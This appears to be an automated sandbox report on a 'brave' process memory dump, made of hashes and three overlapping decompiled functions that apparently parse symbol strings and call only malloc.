Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: eff3cf0a3ead3182ce9a2d061d4ff4c747767f33054f4b93d232421270182bae
Instruction ID: fbab6d1beeb5d3a3e683bb96fba73c39e3b70aa2920c01dd7e7a8e729d0d7374
Opcode Fuzzy Hash: eff3cf0a3ead3182ce9a2d061d4ff4c747767f33054f4b93d232421270182bae
Instruction Fuzzy Hash: 73210872909F0582E7389F14E88136AB3A0FB84B68F954535C2CD073B4CF7DD58887A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B96288 Relevance: 1.3, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00007FF77FF715B96288(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t108;
				signed int _t119;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				signed int _t139;
				signed int _t142;
				void* _t171;
				intOrPtr* _t176;
				intOrPtr* _t179;
				intOrPtr* _t182;
				char* _t183;
				signed char* _t184;
				intOrPtr* _t187;
				intOrPtr* _t190;
				signed char* _t193;
				intOrPtr* _t196;
				signed char* _t197;
				signed char* _t199;
				signed char* _t200;
				intOrPtr* _t233;
				signed char* _t234;
				signed char* _t235;
				long long _t244;
				void* _t251;

				_t125 =  *(__rbx + 0x28);
				if (_t125 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26dc;
				_t176 = (_t125 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t176 + 4)) = 0;
				 *(__rbx + 0x28) = _t125 + 1;
				 *_t176 = 0x27;
				 *((long long*)(_t176 + 0x10)) = 0x15e45320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t127 =  *(__rbx + 0x28);
				if (_t127 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26a9;
				_t179 = (_t127 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t179 + 4)) = 0;
				 *(__rbx + 0x28) = _t127 + 1;
				 *_t179 = 0x27;
				 *((long long*)(_t179 + 0x10)) = 0x15e453c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t129 =  *(__rbx + 0x28);
				if (_t129 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2702;
				_t182 = (_t129 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t182 + 4)) = 0;
				 *(__rbx + 0x28) = _t129 + 1;
				 *_t182 = 0x27;
				 *((long long*)(_t182 + 0x10)) = 0x15e45360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x15b95c22;
				 *_t182 =  *_t182 + __eax;
				_t108 =  *(__rbx + 0x28);
				if (_t108 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t233 = (_t108 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t233 + 4)) = 0;
				 *(__rbx + 0x28) = _t108 + 1;
				 *_t233 = 0x42;
				 *((intOrPtr*)(_t233 + 0x10)) = E00007FF77FF715B94E90(_t182, __rbx, __rdx, __r8, _t251);
				_t183 =  *(__rbx + 0x18);
				if ( *_t183 != 0x5f) goto 0x15b95c20;
				_t184 = _t183 + 1;
				 *(__rbx + 0x18) = _t184;
				E00007FF77FF715B95BC0();
				E00007FF77FF715B94DD0();
				_a40 = _t184;
				_t132 =  *(__rbx + 0x28);
				if (_t132 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2670;
				_t187 = (_t132 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t187 + 4)) = 0;
				 *(__rbx + 0x28) = _t132 + 1;
				 *_t187 = 0x27;
				 *((long long*)(_t187 + 0x10)) = 0x15e45340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t134 =  *(__rbx + 0x28);
				if (_t134 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t190 = (_t134 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t190 + 4)) = 0;
				 *(__rbx + 0x28) = _t134 + 1;
				 *_t190 = 0x27;
				 *((long long*)(_t190 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t136 =  *(__rbx + 0x28);
				if (_t136 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t193 = (_t136 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t193 + 4)) = 0;
				 *(__rbx + 0x28) = _t136 + 1;
				 *_t193 = 0x27;
				 *((long long*)(_t193 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t193;
				_t139 =  *(__rbx + 0x28);
				if (_t139 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t196 = (_t139 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t196 + 4)) = 0;
				 *(__rbx + 0x28) = _t139 + 1;
				 *_t196 = 0x27;
				 *((long long*)(_t196 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t196, __rbx);
				_a40 = _t196;
				if (_t196 == 0) goto 0x15b95c20;
				if ( *_t196 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t197 = _t196 + 1;
				 *(__rbx + 0x18) = _t197;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t197;
				_t234 = _t197;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t234[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t234;
				_t199 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t244 = _a40;
				if (_t244 == 0) goto 0x15b95c20;
				_t142 =  *(__rbx + 0x38);
				if (_t142 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t142 * 8)) = _t244;
				 *(__rbx + 0x38) = _t142 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t199;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t244 + 3;
				E00007FF77FF715B97F20(_t199, __rbx);
				_t235 = _t199;
				if (_t199 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t235);
				_push(__rbx);
				_t200 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t200[1]);
				r10d =  *_t200 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t119 = (r8d >> 0x1f) + r8d >> 1;
				_t171 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t119 + _t119 * 2) * 8)))) - r10b;
				if (_t171 == 0) goto 0x15b96680;
				if (_t171 <= 0) goto 0x15b966c0;
				r8d = _t119;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b96288
0x7ff715b9628e
0x7ff715b962a5
0x7ff715b962a9
0x7ff715b962b1
0x7ff715b962b4
0x7ff715b962ba
0x7ff715b962be
0x7ff715b962c7
0x7ff715b962cd
0x7ff715b962e4
0x7ff715b962e8
0x7ff715b962f0
0x7ff715b962f3
0x7ff715b962f9
0x7ff715b962fd
0x7ff715b96306
0x7ff715b9630c
0x7ff715b96323
0x7ff715b96327
0x7ff715b9632f
0x7ff715b96332
0x7ff715b96338
0x7ff715b9633c
0x7ff715b96340
0x7ff715b9634e
0x7ff715b96350
0x7ff715b96356
0x7ff715b96369
0x7ff715b9636d
0x7ff715b96375
0x7ff715b96378
0x7ff715b96383
0x7ff715b96386
0x7ff715b9638d
0x7ff715b96393
0x7ff715b9639a
0x7ff715b9639e
0x7ff715b963b1
0x7ff715b963b6
0x7ff715b963c0
0x7ff715b963c6
0x7ff715b963dd
0x7ff715b963e1
0x7ff715b963e9
0x7ff715b963ec
0x7ff715b963f2
0x7ff715b963f6
0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0b72ed1d1ec91a9fecf57987d9700a88a3447d5267269d2675c8036d64f49d40
Instruction ID: b750f020ea018f1e4404ea8ae832d879ed511e8c8a05e1a8f20f7a3c5e2b6c74
Opcode Fuzzy Hash: 0b72ed1d1ec91a9fecf57987d9700a88a3447d5267269d2675c8036d64f49d40
Instruction Fuzzy Hash: 42113A72909F0582E7389F14E88036AB3A0FB94B68F958135C28C0B3B4CF7DD588C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9643E Relevance: 1.3, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00007FF77FF715B9643E(void* __rbx, signed char* _a40) {
				signed int _t61;
				signed int _t65;
				signed int _t68;
				signed int _t71;
				void* _t91;
				signed char* _t96;
				intOrPtr* _t99;
				signed char* _t100;
				signed char* _t102;
				signed char* _t103;
				signed char* _t124;
				signed char* _t125;
				long long _t132;

				_t65 =  *(__rbx + 0x28);
				if (_t65 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t96 = (_t65 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t96 + 4)) = 0;
				 *(__rbx + 0x28) = _t65 + 1;
				 *_t96 = 0x27;
				 *((long long*)(_t96 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t96;
				_t68 =  *(__rbx + 0x28);
				if (_t68 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t99 = (_t68 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t99 + 4)) = 0;
				 *(__rbx + 0x28) = _t68 + 1;
				 *_t99 = 0x27;
				 *((long long*)(_t99 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t99, __rbx);
				_a40 = _t99;
				if (_t99 == 0) goto 0x15b95c20;
				if ( *_t99 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t100 = _t99 + 1;
				 *(__rbx + 0x18) = _t100;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t100;
				_t124 = _t100;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t124[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t124;
				_t102 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t132 = _a40;
				if (_t132 == 0) goto 0x15b95c20;
				_t71 =  *(__rbx + 0x38);
				if (_t71 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t71 * 8)) = _t132;
				 *(__rbx + 0x38) = _t71 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t102;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t132 + 3;
				E00007FF77FF715B97F20(_t102, __rbx);
				_t125 = _t102;
				if (_t102 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t125);
				_push(__rbx);
				_t103 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t103[1]);
				r10d =  *_t103 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t61 = (r8d >> 0x1f) + r8d >> 1;
				_t91 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t61 + _t61 * 2) * 8)))) - r10b;
				if (_t91 == 0) goto 0x15b96680;
				if (_t91 <= 0) goto 0x15b966c0;
				r8d = _t61;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction ID: 668c17178a97d1b0ece90450d7b8631ca307781e57fea9095f51e4dceccb781b
Opcode Fuzzy Hash: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction Fuzzy Hash: 3A112B72909F0182E738AF14E880369B3A0FB84B68F958135C28D473A4DF7CD588C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B96306 Relevance: 1.3, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF77FF715B96306(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t92;
				signed int _t103;
				signed int _t109;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t119;
				signed int _t122;
				void* _t149;
				intOrPtr* _t154;
				char* _t155;
				signed char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t162;
				signed char* _t165;
				intOrPtr* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t172;
				intOrPtr* _t203;
				signed char* _t204;
				signed char* _t205;
				long long _t214;
				void* _t221;

				_t109 =  *(__rbx + 0x28);
				if (_t109 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2702;
				_t154 = (_t109 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t154 + 4)) = 0;
				 *(__rbx + 0x28) = _t109 + 1;
				 *_t154 = 0x27;
				 *((long long*)(_t154 + 0x10)) = 0x15e45360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x15b95c22;
				 *_t154 =  *_t154 + __eax;
				_t92 =  *(__rbx + 0x28);
				if (_t92 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t203 = (_t92 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t203 + 4)) = 0;
				 *(__rbx + 0x28) = _t92 + 1;
				 *_t203 = 0x42;
				 *((intOrPtr*)(_t203 + 0x10)) = E00007FF77FF715B94E90(_t154, __rbx, __rdx, __r8, _t221);
				_t155 =  *(__rbx + 0x18);
				if ( *_t155 != 0x5f) goto 0x15b95c20;
				_t156 = _t155 + 1;
				 *(__rbx + 0x18) = _t156;
				E00007FF77FF715B95BC0();
				E00007FF77FF715B94DD0();
				_a40 = _t156;
				_t112 =  *(__rbx + 0x28);
				if (_t112 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2670;
				_t159 = (_t112 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t159 + 4)) = 0;
				 *(__rbx + 0x28) = _t112 + 1;
				 *_t159 = 0x27;
				 *((long long*)(_t159 + 0x10)) = 0x15e45340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t114 =  *(__rbx + 0x28);
				if (_t114 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t162 = (_t114 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t162 + 4)) = 0;
				 *(__rbx + 0x28) = _t114 + 1;
				 *_t162 = 0x27;
				 *((long long*)(_t162 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t116 =  *(__rbx + 0x28);
				if (_t116 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t165 = (_t116 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t165 + 4)) = 0;
				 *(__rbx + 0x28) = _t116 + 1;
				 *_t165 = 0x27;
				 *((long long*)(_t165 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t165;
				_t119 =  *(__rbx + 0x28);
				if (_t119 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t168 = (_t119 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t168 + 4)) = 0;
				 *(__rbx + 0x28) = _t119 + 1;
				 *_t168 = 0x27;
				 *((long long*)(_t168 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t168, __rbx);
				_a40 = _t168;
				if (_t168 == 0) goto 0x15b95c20;
				if ( *_t168 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t169 = _t168 + 1;
				 *(__rbx + 0x18) = _t169;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t169;
				_t204 = _t169;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t204[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t204;
				_t171 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t214 = _a40;
				if (_t214 == 0) goto 0x15b95c20;
				_t122 =  *(__rbx + 0x38);
				if (_t122 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t122 * 8)) = _t214;
				 *(__rbx + 0x38) = _t122 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t171;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t214 + 3;
				E00007FF77FF715B97F20(_t171, __rbx);
				_t205 = _t171;
				if (_t171 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t205);
				_push(__rbx);
				_t172 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t172[1]);
				r10d =  *_t172 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t103 = (r8d >> 0x1f) + r8d >> 1;
				_t149 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t103 + _t103 * 2) * 8)))) - r10b;
				if (_t149 == 0) goto 0x15b96680;
				if (_t149 <= 0) goto 0x15b966c0;
				r8d = _t103;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b96306
0x7ff715b9630c
0x7ff715b96323
0x7ff715b96327
0x7ff715b9632f
0x7ff715b96332
0x7ff715b96338
0x7ff715b9633c
0x7ff715b96340
0x7ff715b9634e
0x7ff715b96350
0x7ff715b96356
0x7ff715b96369
0x7ff715b9636d
0x7ff715b96375
0x7ff715b96378
0x7ff715b96383
0x7ff715b96386
0x7ff715b9638d
0x7ff715b96393
0x7ff715b9639a
0x7ff715b9639e
0x7ff715b963b1
0x7ff715b963b6
0x7ff715b963c0
0x7ff715b963c6
0x7ff715b963dd
0x7ff715b963e1
0x7ff715b963e9
0x7ff715b963ec
0x7ff715b963f2
0x7ff715b963f6
0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
